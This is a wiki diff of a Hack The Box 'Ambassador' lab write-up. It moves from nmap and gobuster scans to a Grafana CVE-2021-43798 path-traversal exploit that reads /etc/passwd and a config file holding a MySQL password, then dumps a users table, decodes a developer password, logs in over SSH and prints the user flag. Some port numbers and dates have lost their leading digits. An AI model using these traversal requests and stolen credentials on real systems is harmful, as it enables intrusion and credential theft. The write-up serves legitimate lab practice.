Differences

This shows you the differences between two versions of the page.

--- ex:htb:ambassador:start [2022/12/22 10:31] – created ebaer
+++ ex:htb:ambassador:start [2022/12/22 17:44] (current) – ebaer
@@ Line 1: / Line 1: @@
 ====== Ambassador ======
+===== NMAP =====
 <code>
+nmap -sS -Pn 10.129.228.56
+Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-22 10:32 CET
+Nmap scan report for 10.129.228.56
+Host is up (0.060s latency).
+Not shown: 996 closed tcp ports (reset)
+PORT     STATE SERVICE
+/tcp   open  ssh
+/tcp   open  http
+/tcp open  ppp
+/tcp open  mysql
 </code>
+<code>
+nmap -A 10.129.228.56
+Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-22 10:33 CET
+Nmap scan report for 10.129.228.56
+Host is up (0.043s latency).
+Not shown: 996 closed tcp ports (reset)
+PORT     STATE SERVICE VERSION
+/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+|   3072 29dd8ed7171e8e3090873cc651007c75 (RSA)
+|   256 80a4c52e9ab1ecda276439a408973bef (ECDSA)
+|_  256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)
+/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
+|_http-server-header: Apache/2.4.41 (Ubuntu)
+|_http-generator: Hugo 0.94.2
+|_http-title: Ambassador Development Server
+/tcp open  ppp?
+| fingerprint-strings:
+|   FourOhFourRequest:
+|     HTTP/1.0 302 Found
+|     Cache-Control: no-cache
+|     Content-Type: text/html; charset=utf-8
+|     Expires: -1
+|     Location: /login
+|     Pragma: no-cache
+|     Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
+|     X-Content-Type-Options: nosniff
+|     X-Frame-Options: deny
+|     X-Xss-Protection: 1; mode=block
+|     Date: Thu, 22 Dec 2022 09:34:00 GMT
+|     Content-Length: 29
+|     href="/login">Found</a>.
+|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
+|     HTTP/1.1 400 Bad Request
+|     Content-Type: text/plain; charset=utf-8
+|     Connection: close
+|     Request
+|   GetRequest:
+|     HTTP/1.0 302 Found
+|     Cache-Control: no-cache
+|     Content-Type: text/html; charset=utf-8
+|     Expires: -1
+|     Location: /login
+|     Pragma: no-cache
+|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
+|     X-Content-Type-Options: nosniff
+|     X-Frame-Options: deny
+|     X-Xss-Protection: 1; mode=block
+|     Date: Thu, 22 Dec 2022 09:33:29 GMT
+|     Content-Length: 29
+|     href="/login">Found</a>.
+|   HTTPOptions:
+|     HTTP/1.0 302 Found
+|     Cache-Control: no-cache
+|     Expires: -1
+|     Location: /login
+|     Pragma: no-cache
+|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
+|     X-Content-Type-Options: nosniff
+|     X-Frame-Options: deny
+|     X-Xss-Protection: 1; mode=block
+|     Date: Thu, 22 Dec 2022 09:33:34 GMT
+|_    Content-Length: 0
+/tcp open  mysql   MySQL 8.0.30-0ubuntu0.20.04.2
+| mysql-info:
+|   Protocol: 10
+|   Version: 8.0.30-0ubuntu0.20.04.2
+|   Thread ID: 9
+|   Capabilities flags: 65535
+|   Some Capabilities: FoundRows, InteractiveClient, IgnoreSpaceBeforeParenthesis, SupportsTransactions, Support41Auth, Speaks41ProtocolOld, LongColumnFlag, IgnoreSigpipes, SwitchToSSLAfterHandshake, SupportsLoadDataLocal, ODBCClient, Speaks41ProtocolNew, ConnectWithDatabase, LongPassword, SupportsCompression, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
+|   Status: Autocommit
+|   Salt: <,miU\x0F\x07\x073\x03\x0F(:\x15\x10\x08fAJJ
+|_  Auth Plugin Name: caching_sha2_password
+</code>
+===== Website =====
+{{:ex:htb:ambassador:htb-ambassador-1.jpg?direct&600|}}
+==== Gobuster ====
+<code>
+gobuster dir -w /usr/share/wordlists/dirb/common.txt --url http://10.129.228.56
+===============================================================
+Gobuster v3.3
+by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+===============================================================
+[+] Url:                     http://10.129.228.56
+[+] Method:                  GET
+[+] Threads:                 10
+[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
+[+] Negative Status codes:   404
+[+] User Agent:              gobuster/3.3
+[+] Timeout:                 10s
+===============================================================
+/12/22 10:41:28 Starting gobuster in directory enumeration mode
+===============================================================
+/.hta                 (Status: 403) [Size: 278]
+/.htaccess            (Status: 403) [Size: 278]
+/.htpasswd            (Status: 403) [Size: 278]
+/categories           (Status: 301) [Size: 319] [--> http://10.129.228.56/categories/]
+/images               (Status: 301) [Size: 315] [--> http://10.129.228.56/images/]
+/index.html           (Status: 200) [Size: 3654]
+/posts                (Status: 301) [Size: 314] [--> http://10.129.228.56/posts/]
+/server-status        (Status: 403) [Size: 278]
+/sitemap.xml          (Status: 200) [Size: 645]
+/tags                 (Status: 301) [Size: 313] [--> http://10.129.228.56/tags/]
+Progress: 4561 / 4615 (98.83%)===============================================================
+/12/22 10:41:49 Finished
+===============================================================
+</code>
+====== Grafana - Port 3000 ======
+  * Version 8.2.0 -> CVE-2021-43798
+<code>
+gobuster dir -w /usr/share/wordlists/dirb/common.txt --url http://10.129.228.56:3000 --exclude-length "29"
+===============================================================
+Gobuster v3.3
+by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+===============================================================
+[+] Url:                     http://10.129.228.56:3000
+[+] Method:                  GET
+[+] Threads:                 10
+[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
+[+] Negative Status codes:   404
+[+] Exclude Length:          29
+[+] User Agent:              gobuster/3.3
+[+] Timeout:                 10s
+===============================================================
+/12/22 10:49:23 Starting gobuster in directory enumeration mode
+===============================================================
+/apis                 (Status: 401) [Size: 27]
+/api                  (Status: 401) [Size: 27]
+/login                (Status: 200) [Size: 26724]
+/org                  (Status: 302) [Size: 24] [--> /]
+/public               (Status: 302) [Size: 31] [--> /public/]
+/robots.txt           (Status: 200) [Size: 26]
+/signup               (Status: 200) [Size: 26693]
+Progress: 4509 / 4615 (97.70%)===============================================================
+/12/22 10:49:44 Finished
+===============================================================
+</code>
+<code>
+https://github.com/A-D-Team/grafanaExp
+./grafanaExp_linux_amd64 exp -u "http://10.129.228.56:3000"
+/12/22 11:15:24 Target vulnerable has plugin [alertlist]
+/12/22 11:15:24 Got secret_key [SW2YcwTIb9zpOOhoPsMm]
+/12/22 11:15:24 There is [0] records in db.
+/12/22 11:15:24 type:[mysql]	name:[mysql.yaml]		url:[]	user:[grafana]	password[]	database:[grafana]	basic_auth_user:[]	basic_auth_password:[]
+/12/22 11:15:24 All Done, have nice day!
+</code>
+===== RFI CVE-2021-43798 =====
+<code>
+GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1
+Host: 10.129.228.56:3000
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: redirect_to=%2Fpublic%2Fplugins%2Fmysql%2F
+Connection: close
+</code>
+<code>
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
+syslog:x:104:110::/home/syslog:/usr/sbin/nologin
+_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
+uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
+tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
+landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
+pollinate:x:110:1::/var/cache/pollinate:/bin/false
+usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
+systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
+developer:x:1000:1000:developer:/home/developer:/bin/bash
+lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
+grafana:x:113:118::/usr/share/grafana:/bin/false
+mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
+consul:x:997:997::/home/consul:/bin/false
+</code>
+<code>
+GET /public/plugins/alertlist/../../../../../../../../var/www/html/index.html
+</code>
+<code>
+/etc/grafana/provisioning/datasources/mysql.yaml
+GET /public/plugins/alertlist/../../../../../../../../etc/grafana/provisioning/datasources/mysql.yaml HTTP/1.1
+HTTP/1.1 200 OK
+Accept-Ranges: bytes
+Cache-Control: no-cache
+Content-Length: 180
+Content-Type: application/x-yaml
+Expires: -1
+Last-Modified: Fri, 02 Sep 2022 00:56:07 GMT
+Pragma: no-cache
+X-Content-Type-Options: nosniff
+X-Frame-Options: deny
+X-Xss-Protection: 1; mode=block
+Date: Thu, 22 Dec 2022 13:26:24 GMT
+Connection: close
+apiVersion: 1
+datasources:
+ - name: mysql.yaml
+   type: mysql
+   host: localhost
+   database: grafana
+   user: grafana
+   password: dontStandSoCloseToMe63221!
+   editable: false
+</code>
+===== msf mysql enum =====
+<code>
+msf6 > use auxiliary/admin/mysql/mysql_enum
+msf6 auxiliary(admin/mysql/mysql_enum) > show info
+       Name: MySQL Enumeration Module
+     Module: auxiliary/admin/mysql/mysql_enum
+    License: Metasploit Framework License (BSD)
+       Rank: Normal
+Provided by:
+  Carlos Perez <carlos_perez@darkoperator.com>
+Check supported:
+  No
+Basic options:
+  Name      Current Setting  Required  Description
+  ----      ---------------  --------  -----------
+  PASSWORD                   no        The password for the specified username
+  RHOSTS                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+  RPORT     3306             yes       The target port (TCP)
+  USERNAME                   no        The username to authenticate as
+Description:
+  This module allows for simple enumeration of MySQL Database Server
+  provided proper credentials to connect remotely.
+References:
+  https://cisecurity.org/benchmarks.html
+View the full module info with the info -d command.
+msf6 auxiliary(admin/mysql/mysql_enum) > set PASSWORD dontStandSoCloseToMe63221!
+PASSWORD => dontStandSoCloseToMe63221!
+msf6 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 10.129.228.56
+RHOSTS => 10.129.228.56
+msf6 auxiliary(admin/mysql/mysql_enum) > set username grafana
+username => grafana
+msf6 auxiliary(admin/mysql/mysql_enum) > set ConnectTimeout 30
+ConnectTimeout => 30
+msf6 auxiliary(admin/mysql/mysql_enum) > run
+</code>
+-> Timeout (anti metasploit measures?)
+===== MySQL manual =====
+<code>
+show databases;
+use information_schema
+select * from tables;
+| def           | whackywidget       | users                                                | BASE TABLE  | InnoDB             |      10 | Dynamic    |          0 |              0 |       16384 |               0 |            0 |         0 |           NULL | 2022-09-02 00:49:04 | NULL        | NULL       | utf8mb4_0900_ai_ci |     NULL |                                       |                                          |
+| def           | performance_schema | innodb_redo_log_files                                | BASE TABLE  | PERFORMANCE_SCHEMA |      10 | Dynamic    |          1 |              0 |           0 |               0 |            0 |         0 |           NULL | 2022-12-22 09:31:21 | NULL        | NULL       | utf8mb4_0900_ai_ci |     NULL |                                       |                                          |
++---------------+--------------------+------------------------------------------------------+-------------+--------------------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+--------------------+----------+---------------------------------------+------------------------------------------+
+rows in set (0.325 sec)
+MySQL [information_schema]>  use whackywidget;
+Reading table information for completion of table and column names
+You can turn off this feature to get a quicker startup with -A
+Database changed
+MySQL [whackywidget]> show tables;
++------------------------+
+| Tables_in_whackywidget |
++------------------------+
+| users                  |
++------------------------+
+row in set (0.048 sec)
+MySQL [whackywidget]> select * from users;
++-----------+------------------------------------------+
+| user      | pass                                     |
++-----------+------------------------------------------+
+| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
++-----------+------------------------------------------+
+row in set (0.047 sec)
+</code>
+<code>
+echo "YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg==" | base64 -d
+anEnglishManInNewYork027468
+</code>
+<code>
+sh developer@10.129.228.56
+developer@10.129.228.56's password:
+Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64)
+[...]
+Last login: Fri Sep  2 02:33:30 2022 from 10.10.0.1
+developer@ambassador:~$ cat user.txt
+bdff80ba21c478079a3332f785c4ddba